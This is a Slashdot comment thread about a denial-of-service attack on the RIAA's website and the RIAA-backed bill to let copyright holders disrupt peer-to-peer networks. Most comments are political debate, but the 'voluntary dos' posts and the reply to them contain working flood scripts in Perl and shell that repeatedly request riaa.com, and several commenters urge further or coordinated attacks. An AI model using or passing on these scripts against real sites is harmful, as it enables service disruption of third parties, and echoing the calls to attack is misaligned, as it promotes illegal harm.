RIAA Smacked by DoS

nekid writes "ZDNet is reporting that the RIAA's website was hit by a denial-of-service (DoS) attack over the weekend, most likely in response to their endorsement of legislation that would give them permission to do the same to personal computers that are pirating music (see earlier article). Seems to me that they are killing themselves with bad public relations..." But it seems to me that they don't care, and are instead banking on the ignorance of the bulk of the world.

Great...

[brad-x]

Certainly not the most constructive of things to be doing to an organisation that already wants to paint internet users as miscreants, largely. One wonders if they'll approach Congress and call it an act of anti-captitalist terrorism ... :P Funny though. :)

Userfriendly

[Sobrique]

Userfriendly link [userfriendly.org] for those who didn't see it :)
A tragic irony isn't it?
I wonder if we can start a campaign to keep the RIAA DoSed off the net. Not that I'd ever condone such a thing, but there are times when a little net abuse is so poetic.

bad publicity...

[bje2]

wow, didn't they get enough publicity when this story [slashdot.org] was announced last week...i'm not saying they should have ignored this DOS attack, but it seems to me the RIAA rep had a little too much attitude with quotes like "Don't they have something better to do during the summer than hack our site?" and especially "Perhaps it at least took 10 minutes away from stealing music."...talk about antogonizing the masses...couldn't they comment on this story without being blatantly condescending and arrogant???

on the good side, maybe the link to the RIAA website [riaa.com] with this story will slashdot their site and bring it down again....

Bad public relations? Doubtful.

[Anonymous Coward]

Seems to me that they are killing themselves with bad public relations...

Think different.

Here's the predicted headline: "Hackers Respond to RIAA's Proposed Legislation By Vandalizing Website".

That is, RIAA: mature and respectful, Anti-RIAA: bratty idiotic thugs.

What is amusing is.....

[Viewsonic]

If the RIAA downloads illegal MP3s, even to check to see if they're legit illegal copies, this in turn opens THEM of for legit DoS attacks. The person in question that is doing the "checking" for the RIAA better own the right to every single MP3 he downloads. They're going to need to have the artists themselves sit at the cpus and do the DoS's for this to even be legal, it can't be based around "trust". Quite an evil little repurcussion .. If this goes live, it will effectively DESTROY the RIAA.

voluntary dos

[drDugan]

#!/usr/bin/perl

while (1){

`wget "http://www.riaa.com" -nc -r -l 0 -k -nH -o /dev/null -O /dev/null`;

}

# one of many many ways to do this...

Artists aren't the only ones who make an effort...

[Tall Rob Mc]

On Thursday, the RIAA endorsed a bill written by Rep. Howard Berman, D-Calif., that would authorize copyright holders to begin "blocking, diverting or otherwise impairing" peer-to-peer networks. RIAA CEO Hilary Rosen said in a statement that Berman's bill was "an innovative approach," adding that "it makes sense to clarify existing laws to ensure that copyright owners--those who actually take the time and effort to create an artistic work--are at least able to defend their works from mass piracy."

What about all of the programmers who actually take the time and effort to establish worldwide networks where people can directly share information? Who is the RIAA to decide which person's effort is worth more?

There has to be a better idea to stopping the RIAA

[sjgman9]

They "hire" companies that run search spider programs that automate dns queries and instant cease and desist letters. Lets slashdot all the sites of all the companies that act as bounty hunters on the behalf of the RIAA. If not, then at least get their netblocks known and firewall them off to null. That way they cant find us or do anything

Re:and why not?

[John_Booty]

c) When they are allowed if you really want to play "an eye for an eye..." then, by your own standards, you have no right to DOS them unless they DOS you and you can prove it.

"First they came for the Communists, but I was not a Communist so I did not speak out. Then they came for the Socialists and the Trade Unionists, but I was neither, so I did not speak out. Then they came for the Jews, but I was not a Jew so I did not speak out. And when they came for me, there was no one left to speak out for me."

While the RIAA DOS'ing people's networks isn't nearly as dramatic or awful as the scenarios described in this quote, I think it's the same principle.

Conspiracy theory.

[WiredOni]

I have the feeling that the RIAA could have done this to themselves so that they could drum up support for their bill and what ever they try to pass. What better way to gain simpathy and support then to DOS or give the impression that you where DOSed? While I think the RIAA was immature with their comments and actions, a DOS gives off the impression that P2P users are really immature.

Re:Mature

[Jucius Maximus]

If anything good comes of this, it will be the publicity. Let's hope an intelligent columnist clues into what's really going on and lets the general public know about it.

Re:Mature

[lightcycler]

"Immaturity like this only HARMS what we are trying to do."

WTF? The music industry just started illegally interfering with computer networks to the detriment of others (hacking, to misuse that word), and people complain that a DDOS on their website is immature?

As immature perhaps, as spending millions in congress to disrupt others' computers, before sarcastically quipping "at least they've stopped stealing for 10 minutes" when someone does the same back to them?

Bring it on. The more this group's website gets attacked, the happier I'll feel laughing at them. They want to legalise hacking? Let's show people what it will mean in practise.

Need I remind anyone here that individuals are copyright-holders too?

Re:Mature

[Fat Casper]

I'm sure that Andovernet would prosecute anyone who DOS'd ./ over a political disagreement.

The RIAA just bought a bill to legalize DOSs as part of a political disagreement.

These DOS attacks are not justice,

Which is the point that this weekend's perps were trying to illustrate.

If you're smart, capable, and under 18

[Inoshiro]

This kind of thing, short of FLYING over to their HQ and having a sit in, is the only means you have of expressing yourself.

Re:Mature

[YanceyAI]

Do you think the RIAA would consider being slashdotted a DoS attack?

considering the alternative...

[zoombat]

I was about to defend the act.. because really, what are they supposed to do to prevent a distributed network of thousands of users from illegally trading copyrighted files?? They can't really take them all to court...

I like that the bill requires them to NOTIFY the Attorney General before they do anything... I don't like that they don't have to wait for approval.

So I started to think... "How would I feel if I was faced with 1000's of people scattered covertly across the country violating my rights?" Then I realized that I do... SPAMers. Sure, if I had the time, money, and expertise, I could take them each to court. But the reality is that even if I get SPAM, the best I can do is report the SPAMer to their ISP and hope they're not SPAM-friendly and will shut the account/network connection down.

So either they should allow us to DoS or hack SPAMers' computers, or they should require the RIAA or whomever to get ISPs to shut down illegal file sharing internet connections.. just like the rest of us.

It was bound to happen sooner or later.

[El Jynx]

Besides, I think it's good to give one decent dDOS as a 'shot across the bow' so the RIAA knows what it's playing with. Should the legislature be approved, I somehow don't think the RIAA site will stay online very long anymore; there's relatively few people who control so many computers that they can dDOS at their leisure, but there's enough. Had the dDOS's started after the bill was approved then it would have been next to useless. Now it's still next to useless, but it sparks up a lot more discussion.

Jynx

The RIAA is still a group of fools, though; the boomerang is swinging back to hit them in the face much in the same way US citizens are being screwed for doctor support because everyone's sueing them. US legislature just goes too far in that respect.

The RIAA just doesn't get it

[dkroells]

In all of this law making, the RIAA has not realized a few basic facts. Most of these are relative to me, but I'm sure I'm not alone:

1. When Napster was big, I purchased 75-100 CDs in two years and enjoyed about 80% of them. Since then, I have purchased about 10 CDs and enjoyed about 20% of them. I would rather gamble $15 on a blackjack table then buy a $15 CD when I have only heard one song I like on it.

2. I don't own a plain-old CD player. I have a MP3-CD player, a laptop, and a desktop. If I can't listen to or convert the CD I won't buy it.

3. I'm not a fan of the MPAA either, but which would you rather purchase: A soundtrack CD of a given movie for $17.99 or the DVD of the same movie for $14.99? To me, a music CD is worth about $8, and at least 25% of that should go to the people who actually created those sounds(artists, songwriters).

4. I don't believe the DoS on the RIAA last weekend was necessary, but it will be a preview of what will happen if that new law passes. (Just a prediction)

5. What ever happened to "The customer is always right"? All of this copy-protection, "everyone is stealing our music", "we need tougher laws" stuff can't possibly be in the consumer's best interest. Sounds to me that they are trying to maintain a monopoly. (Hmmm... now where have I seen this before?)

Anyway, I dig into my current music collection, books, magazines, and a few select internet sites for my media these days. I've just about had enough. Everything in this post is my opinion based on some facts and is probably in need of some correction. Have a nice day.

Re:Mature

[careo]

I'm sure the RIAA knows this and are grinning at their (mis)fortune and calling their congressional lackeys about it.

Hell, they might even have had the webmaster pull the plug on the machine for the weekend so they can say, "Look old chum, these Internet chaps are evil and need to be stopped."

Either that, or it's the script kiddy way of applying for a job with the RIAA.

We don't need legislation to stay within the law

[csnydermvpsoft]

That's an interesting concept - if we plan a day in advance to something of the effect of "at 5:00EDT, everyone go to the RIAA site" - that would create a very effective, yet very legal, DoS.

OK, everyone, tomorrow, July 31, 5:00EDT, attack. :-)

We don't need legislation.

Re:Great job...

[digitalsushi]

speaking of immature...

"Don't they have something better to do during the summer than hack our site?" asked the RIAA representative, who asked not to be identified. "Perhaps it at least took 10 minutes away from stealing music."

Yeah. We get it. They're internet hackers on summer break, so they must be stealing music! Sorry I just find the slant on that RIAA quote as half troll/closer to flamebait. Course as someone else said, thats the point of the RIAA- get the people angry at them and not their members.

RIAA offline

[PinkFloyd]

Actually, riaa.org [riaa.org] is still alive and well, though riaa.com [riaa.com] is off the air...

Re:voluntary dos

[Anonymous Coward]

are you some sort of crack monkey, or what?

#!/bin/sh

while true
do
wget http://www.riaa.com -nc -r -l 0 -k -nH -o/dev/null -O/dev/null &
done
==============
*or*
==============
#!/usr/bin/perl

use LWP::Parallel::UserAgent;
use HTTP::Request;

my $req = HTTP::Request->new('GET','http://www.riaa.com') ;

my $pua = LWP::Parallel::UserAgent->new();
$pua->in_order(0);
$pua->duplicates(1);
$pua->timeout(5);
$pua->redirect(0);

while (1)
{
$pua->register($req);
}

#don't mix and match perl and sh like that unless absolutely necessary.
#it's ugly and wastes resources

A Mature Denial of Service attack

[gnugnugnu]

from http://www.vigilante.com/inetsecurity/hacktivism_1 .htm

There is an important corresponding technical dimension that reinforces hacktivist claims of populist support. Hacktivist DoS attacks must be executed using client side or individual browser based tools. The prototypical Zapatista Floodnet tool, (which other groups have continued to develop) requires downloading and installing a Java applet. Moreover, these tools need to be consciously scheduled and aimed at a specific web address; actions that presumably demonstrate solidarity and commitment. To some hacktivists this distinction is all-important because it differentiates their activities from the nihilistic and anonymous February DDoS attacks on the CNN, Yahoo, and eBay e-commerce sites. During those assaults, allegedly orchestrated by "mafiaboy" and a few other apolitical participants, DoS "zombie" servers were surreptitiously placed on unwary host systems and triggered en masse. In fact, the utility programs used for swarming attacks, rooted in performance art, are far less powerful than hardcore "smurfing" weapons like Trin00, Stachaldraht and TFN2K.

Flood attacks can be used as a useful form of civil disobedience if used correctly in a *focussed and organised* way.

RIAA site not down?

[FIRESTORM_v1]

I am detecting someone's mucking with the javascript....

You go to this site http://www.riaa.comand you get the generic error:

HTTP Error 403

403.9 Access Forbidden: Too many users are connected

This error can be caused if the Web server is busy and cannot process your request due to heavy traffic. Please try to connect again later.

Please contact the Web server's administrator if the problem persists.

However..... if you rightclick and go to "View Source" you see the source page for their index.htm like so: (note: code mangled to prevent rendering... Don't want to fsck Slashdot by accident!)

< html >
< head >
< title >Recording Industry Association of America< /title >
< meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" >
<meta content="ISRC, International Standard Recording Code" >
<script language="JavaScript" >
< !-- hide from JavaScript-challenged browsers
function openWindow() {

popupWin = window.open('Glossary.cfm', 'glossary', 'scrollbars,width=500,height=300')

}

function openPrintWindow() {

printWin = window.open('Printing.cfm', 'printing', 'scrollbars,width=500,height=300');

} // done hiding -->
</script>

<script LANGUAGE="JavaScript">
<!--

NS4 = (document.layers);
IE4 = (document.all);
ver4 = (NS4 || IE4);
isBlueberry = (navigator.appVersion.indexOf("Mac") != -1);
isPC = (navigator.appVersion.indexOf("Win") != -1);
isCool = (navigator.appVersion.indexOf("X11") != -1);
isMenu = (NS4 || (IE4 && !isBlueberry));

function popUp(){return};
function popDown(){return};

(damn lameness filter, place an <hr> here)

Just my .02c (Note: by reading this message and the text within you agree not to hold, this user, this user's ISP or slashdot responsible for any of our actions....

Re:It was bound to happen sooner or later.

[Hater's Leaving, The]

Agreed.

I reckon that it would be interesteing if the P2P networks were to have a "cry for help" facility, such that if a peer thought it was being dDOSed by the RIAA or whomever else, it would summon help from other peers. Hmmm, currently the only 'help' I can imagine is a return dDOS against the RIAA.

Welcome to the MAdD scenario, Mutually Assured distributed Destruction!

Of course everyone apart from those who paid off the politicians would probably end up in jail - remember to leave your computers switched on, though, as they arrest you.

THL.

What's not being mentioned ...

[freaker_TuC]

... The RIAA will get the right to DOS a user trading music though who is actually affected most? the ISP delivering the connection or the user?

This way the entire thing will get another approach and also affects the backbones and ISP's. Do they need to find a ISP where they have legal status to DOS another (ISP's) user ?

Re:Userfriendly

[zerocool^]

http://ars.userfriendly.org/cartoons/?id=20020623% 26mode=classic [userfriendly.org]

That's another userfriendly link to an RIAA centric cartoon.

~Will